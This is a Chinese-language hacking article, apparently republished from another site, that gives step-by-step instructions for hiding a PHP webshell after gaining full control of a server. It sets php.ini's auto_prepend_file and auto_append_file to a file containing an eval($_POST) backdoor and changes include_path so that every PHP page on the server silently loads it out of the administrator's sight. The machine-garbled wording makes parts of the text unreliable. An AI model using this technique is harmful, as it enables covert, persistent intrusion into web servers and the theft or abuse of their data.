|
|
|
联系客服020-83701501

利用php.ini的另类后门

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
利用php.ini的另类后门

近来在看完了一个步调的代码后又从新温习了PHP中文手册, 在看的过程当中忽然想到了一个暗藏后门的体式格局,拿来给各人分享下 嘿嘿:) 在入侵效力器后如何能将后门做到不被管理员大叔发现这是很烦忙的。因此就出现了各种暗藏的体式格局,对于php来说大可能是拔出<?eval($ _POST[a]);? >或者include()函数暗藏此后批改文件工夫等等。网上多的很我就不在这罗嗦了。

测试情况:Apache/2.0.49 (Win32) PHP/4.3.1+Winxp sp2
在咱们失掉一个效力器的最高权限后咱们概略经由批改效力器的配置文件php.ini来达到咱们暗藏后门的目的。批改系统目次下面的php.ini文件。在php.ini文件第395-397和第420-424一段
图1 图2
1.jpg
2.jpg

根据手册中关于auto_prepend_file和auto_append_file数据处理配置选项概略看出默认条件下是为空的null 并且是e文表明为Automatically add files before or after any PHP document.不用我翻译了吧。假定咱们将eval()函数的后门配置到php.ini文件里那末网站上扫数的PHP文件将乡村被include咱们的后门。嘿嘿 当然是不偏见的只是在赏析的时候才include,当然管理员大叔也是发现不了的。因为后门曾经暗藏看都看不到。
经过测试发现咱们需要批改的php.ini配置文件的2个地方。如图3 图4
3.jpg
4.jpg

第1步:
在图3中批改设置增多咱们eval()函数的后门的文件名,后门文件的名字一定要很是不能用index.php或者 config.php等网站上或许用到的文件名。概略都添上也概略添一个。在此建议后门文件就用<?eVal($_POST[a]);?> 最好将eval()函数大大写变更下。
第2步:
看是甚么系统假定是win那末就批改423-424 在此一定要注意
默认的配置几乎和php自带的不有任何窜改
include_path = “.;c:\php\includes” 负面的 “.”代表/目次 而”;”负面的目次代表Automatically add files扫数include文件的目次 。因此咱们要配置暗藏后门要批改为
include_path = “d:\php\sapi;.” 咱们所要include的文件目次放在根目次的前边。不然的话apache会在根目次下搜索咱们的后门(当然是不有了从而导致效力器赏析php文件败北),作为配置文件当然要把include_path负面的”;”去掉身手见效。此后重起效力便概略了。下面看看咱们暗藏的后门运行的情况 图5

5.jpg
真是杀人于无形啊 扫数效力器网站下面的php文件都概略被咱们当作后门哦 嘿嘿 ! 关于此外情况的测试 在iis5.0 6.0测试经由。根据我个人看法只需效力器支持php赏析此法理当都概略测试靡烂。
跋文:
关于利用php.ini配置文件来做后门当然也概略用来做点此外的器械,比如:include的文件中假定是一个网页木马的网站呢或者是咱们概略写一个暴虐过滤恶意用户提交的非法字符等等。就看你怎么用了 好了就到这吧.

本文作者lis0 转自黑面小窝 由网络安全(www.91ri.org) 征集整顿.

数安新闻+更多

证书相关+更多